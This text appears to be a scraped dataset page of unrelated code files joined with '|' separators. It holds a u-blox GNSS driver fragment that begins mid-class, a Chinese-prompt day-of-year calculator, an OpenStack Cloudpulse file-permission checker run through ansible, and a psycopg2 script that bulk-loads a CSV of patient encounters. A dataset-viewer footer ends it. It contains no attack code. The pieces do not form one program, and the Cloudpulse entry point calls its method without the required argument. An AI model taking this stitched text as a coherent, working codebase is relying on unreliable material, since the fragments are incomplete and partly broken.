    def date_time(self, wait_time = 2500):
        # NAV-PVT -- intentionally identical to geo_coords()
        return self.request_standard_packet('NAV', 'PVT', wait_time = wait_time)
    def satellites(self, wait_time = 2500):
        # NAV-SAT
        return self.request_standard_packet('NAV', 'SAT', wait_time = wait_time)
    def veh_attitude(self, wait_time = 2500):
        # NAV-ATT
        return self.request_standard_packet('NAV', 'ATT', wait_time = wait_time)
    def imu_alignment(self, wait_time = 2500):
        # ESF-ALG
        return self.request_standard_packet('ESF', 'ALG', wait_time = wait_time)
    def vehicle_dynamics(self, wait_time = 2500):
        # ESF-INS
        return self.request_standard_packet('ESF', 'INS', wait_time = wait_time)
    def esf_measures(self, wait_time = 2500):
        # ESF-MEAS
        return self.request_standard_packet('ESF', 'MEAS', wait_time = wait_time)
    def esf_raw_measures(self, wait_time = 2500):
        # ESF-RAW
        return self.request_standard_packet('ESF', 'RAW', wait_time = wait_time)
    def reset_imu_align(self, wait_time = 2500):
        # ESF-RESETALG
        return self.request_standard_packet('ESF', 'RESETALG', wait_time = wait_time)
    def esf_status(self, wait_time = 2500):
        # ESF-STATUS
        return self.request_standard_packet('ESF', 'STATUS', wait_time = wait_time)
    def port_settings(self, wait_time = 2500):
        # MON-COMMS
        return self.request_standard_packet('MON', 'COMMS', wait_time = wait_time)
    def module_gnss_support(self, wait_time = 2500):
        # MON-GNSS
        return self.request_standard_packet('MON', 'GNSS', wait_time = wait_time)
    def pin_settings(self, wait_time = 2500):
        # MON-HW3
        return self.request_standard_packet('MON', 'HW3', wait_time = wait_time)
    def installed_patches(self, wait_time = 2500):
        # MON-PATCH
        return self.request_standard_packet('MON', 'PATCH', wait_time = wait_time) #changed from HW3 to PATCH
    def prod_test_pio(self, wait_time = 2500):
        # MON-PIO
        return self.request_standard_packet('MON', 'PIO', wait_time = wait_time)
    def prod_test_monitor(self, wait_time = 2500):
        # MON-PT2
        return self.request_standard_packet('MON', 'PT2', wait_time = wait_time)
    def rf_ant_status(self, wait_time = 2500):
        # MON-RF
        return self.request_standard_packet('MON', 'RF', wait_time = wait_time)
    def module_wake_state(self, wait_time = 2500): #No response on F9P
        # MON-RXR
        return self.request_standard_packet('MON', 'RXR', wait_time = wait_time)
    def sensor_production_test(self, wait_time = 2500):#No response on F9P
        # MON-SPT
        return self.request_standard_packet('MON', 'SPT', wait_time = wait_time)
    #def temp_val_state(self, wait_time = 2500):#Doesn't work because TEMP structure is not defined on sparkfun_predefines,
    #    return self.request_standard_packet('MON', 'TEMP', wait_time = wait_time)#and i honestly don't even see it on official UBLOX doc to fix it
    def module_software_version(self, wait_time = 2500):
        # MON-VER
        return self.request_standard_packet('MON', 'VER', wait_time = wait_time)
|
#coding=utf-8
class test_judgeday_base_yearmonthday:
    """Interactively read a year, month and day and compute the day-of-year
    (e.g. 2020-03-01 -> 61).

    Fixes over the original:
    - the leap-year test used ``% 4`` only and was inverted (it added the
      extra day to every NON-leap date, so Jan 1 of a common year came out
      as day 2);
    - the leap day is now only added for dates from March onwards;
    - invalid input used to recurse on a brand-new instance and discard the
      result (returning None and crashing ``days()``); it now re-prompts in
      a loop on ``self``.
    """
    # Legacy class attributes kept for backward compatibility.
    year = ""
    month = ""
    day = ""
    actoryDay = ""

    def _read_int(self, prompt, retry_prompt, low=None, high=None):
        """Prompt until the user types an integer within [low, high]."""
        print(prompt)
        while True:
            text = input()
            if text.isdigit():
                value = int(text)
                if (low is None or value >= low) and (high is None or value <= high):
                    return value
            print(retry_prompt)

    def years(self):
        """Ask for the year; return 1 if it is a leap year, else 0."""
        y = self._read_int("请输入年份:", "年份不对,请输入正确的年份", low=1)
        # Full Gregorian rule: /4, except centuries unless /400.
        return 1 if (y % 4 == 0 and (y % 100 != 0 or y % 400 == 0)) else 0

    def months(self):
        """Ask for the month (1-12); remember it on ``self.month`` and return
        the cumulative day count of the preceding months (non-leap)."""
        mon = self._read_int("请输入月份", "请重新输入月份", low=1, high=12)
        self.month = mon
        # Cumulative days before month N in a common year.
        mon_lists = [0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334, 365]
        return mon_lists[mon - 1]

    def days(self):
        """Ask for year, month and day; print and return the day-of-year."""
        leap = self.years()
        days_before_month = self.months()
        intday = self._read_int("请输入天数", "请重新输入天数", low=1, high=31)
        # The leap day only shifts dates from March onwards.
        extra = leap if self.month > 2 else 0
        result = days_before_month + intday + extra
        # Original printed a literal placeholder "X"; show the real value.
        print("这是一年的第 %d 天" % result)
        return result
if __name__ == '__main__':
    # FIX: removed a stray trailing "|" after print(...) that made this line
    # a SyntaxError.
    ju = test_judgeday_base_yearmonthday()
    print(ju.days())
# Copyright 2010-2011 OpenStack Foundation
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ast
import cloudpulse
from cloudpulse.operator.ansible.ansible_runner import ansible_runner
import json
import os
import subprocess
class SecurityFileCheck(object):
    """Cloudpulse security plugin that validates file permissions on
    OpenStack hosts against a per-role baseline, executed remotely via
    ansible."""

    def perform_file_permission_check(self, input_params):
        """Run the remote file-permission check described by *input_params*.

        :param input_params: dict expected to provide 'testcase_name',
            'global_data' (with 'file_info_dir' and 'is_containerized'),
            'perform_on' (list of roles), 'os_host_list', 'baseline_file'
            and a '<role>_dir' mapping for each role in perform_on.
        :returns: tuple ``(status, results, messages)`` -- status 200 when
            every host reported success, 404 otherwise.
        """
        # FIX: initialized before the try block so the except-branch cleanup
        # cannot raise NameError (masking the real error) when the exception
        # fires before file_info_dir is assigned from input_params.
        file_info_dir = None
        try:
            print ("Executing the test ", input_params.get('testcase_name'))
            final_result = []
            final_status = []
            final_msg = []
            file_info_dir = input_params['global_data']['file_info_dir']
            is_containerized = input_params['global_data']['is_containerized']
            perform_on = input_params['perform_on']
            if perform_on is None or not perform_on:
                print ("Perform on should be mentioned either at test level" +
                       " or test case level")
                msg = {'message': 'Perform on should be mentioned either at' +
                       ' test level or test case level'}
                return (404, json.dumps([msg]), [])
            os_hostobj_list = input_params['os_host_list']
            base_dir = os.path.dirname(cloudpulse.__file__)
            baseline_file = input_params['baseline_file']
            # Files shipped to the remote host/container for each run.
            flist = [base_dir +
                     "/scenario/plugins/security_pulse/testcase/" +
                     "remote_file_check.py",
                     base_dir + "/scenario/plugins/security_pulse/testcase/" +
                     "remote_filecredentials.py",
                     file_info_dir + "dir_list",
                     file_info_dir + "os_baseline"]

            def ConsolidateResults(flist, container_name=None):
                # Runs remote_file_check.py through ansible and folds the
                # parsed status/result/message triple into the accumulators.
                # NOTE: relies on ans_runner being bound by the loop below
                # before the first call.
                result = ans_runner.execute_cmd(
                    "python " +
                    file_info_dir +
                    "remote_file_check.py ",
                    file_list=flist, container_name=container_name)
                Result = ans_runner.get_parsed_ansible_output(result)
                final_status.append(Result[0])
                final_result.extend(ast.literal_eval(Result[1]))
                final_msg.extend(Result[2])

            for p in perform_on:
                for obj in os_hostobj_list:
                    ans_runner = ansible_runner([obj])
                    if obj.getRole() == p:
                        os_dir = input_params[p + '_dir']
                        # Baseline file is a python literal; parse then dump
                        # the slice for this role where the remote check
                        # expects it.
                        all_baseline = ast.literal_eval(
                            open(baseline_file).read())
                        baseline = all_baseline[p]
                        # FIX: use a context manager so the baseline handle
                        # is flushed/closed (was left dangling before).
                        with open(file_info_dir + 'os_baseline', 'w') as bf:
                            bf.write(str(baseline))
                        # if container, make dir list and copy to container
                        if is_containerized:
                            for container, os_dir in os_dir.items():
                                self.createDirList(
                                    os_dir,
                                    file_info_dir)
                                ConsolidateResults(
                                    flist,
                                    container_name=container)
                                subprocess.call([
                                    'rm',
                                    file_info_dir +
                                    'dir_list'])
                        else:
                            # Flatten the per-container directory lists into
                            # one list for a bare-metal host.
                            os_dir_list = []
                            for dirs in os_dir.values():
                                os_dir_list.extend(dirs)
                            self.createDirList(os_dir_list, file_info_dir)
                            ConsolidateResults(flist)
                            subprocess.call([
                                'rm', '-rf',
                                file_info_dir +
                                'os_baseline',
                                file_info_dir +
                                'output'])
                            subprocess.call([
                                'rm',
                                file_info_dir +
                                'dir_list'])
            if 404 in final_status:
                return (404, final_result, final_msg)
            else:
                return (200, final_result, final_msg)
        except Exception as e:
            print ("exception in perform_file_permission_check is--", e)
            # Best-effort cleanup -- only possible if we got far enough to
            # know where the temp files live.
            if file_info_dir:
                subprocess.call([
                    'rm', '-rf',
                    file_info_dir +
                    'os_baseline',
                    file_info_dir +
                    'output'])
                subprocess.call([
                    'rm',
                    file_info_dir +
                    'dir_list'])
            print (
                "Exception occured in executing" +
                " perform_file_permission_check")
            message = {
                'message': 'Test case execution failed due to some exception'}
            return (404, json.dumps([message]), [])

    def createDirList(self, os_dir, file_info_dir):
        """Write one directory path per line to <file_info_dir>dir_list."""
        if os_dir is not None:
            # FIX: context manager guarantees the file is closed on error.
            with open(file_info_dir + 'dir_list', 'w+') as f:
                for dir_name in os_dir:
                    f.write(dir_name + '\n')
if __name__ == '__main__':
    # NOTE(review): perform_file_permission_check() requires an input_params
    # dict -- this no-argument call raises TypeError at runtime. Supply real
    # test parameters (see the method's expected keys) before using this
    # entry point.
    sec = SecurityFileCheck()
    sec.perform_file_permission_check()
|
import psycopg2

# One-shot loader: create new_schema.Encounters and bulk-load it from a CSV
# export. NOTE: COPY FROM reads the file on the *server* side, so the path
# below must be readable by the postgres server process.
conn = psycopg2.connect("dbname=siavash_database")
try:
    cur = conn.cursor()
    # Create the target table (raises if it already exists).
    cur.execute("""
    CREATE TABLE new_schema.Encounters (
    Encounter_EntryID integer,
    MRN text,
    Encounter_UniqueID integer,
    Encounter_Date date,
    Encounter_Status text,
    Encounter_Type text,
    Encounter_Department text,
    Encounter_Specialty text,
    Encounter_Provider text,
    Encounter_HeightLength text,
    Encounter_SystolicBloodPressure numeric,
    Encounter_DiastolicBloodPressure numeric,
    Encounter_Pulse numeric,
    Encounter_Respirations numeric,
    Encounter_Weight numeric)
    """)
    conn.commit()
    # Bulk-load the CSV (header row skipped by CSV HEADER).
    cur.execute("""
    COPY new_schema.Encounters
    FROM
    '/Users/siavashmortezavi/Documents/UCSF/file_conversion_pipeline/csv/Encounters.csv' DELIMITER ',' CSV HEADER;
    """)
    conn.commit()
finally:
    # FIX: close the connection even when an execute fails (it was leaked on
    # error before); also removed a stray trailing "|" that was a SyntaxError.
    conn.close()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.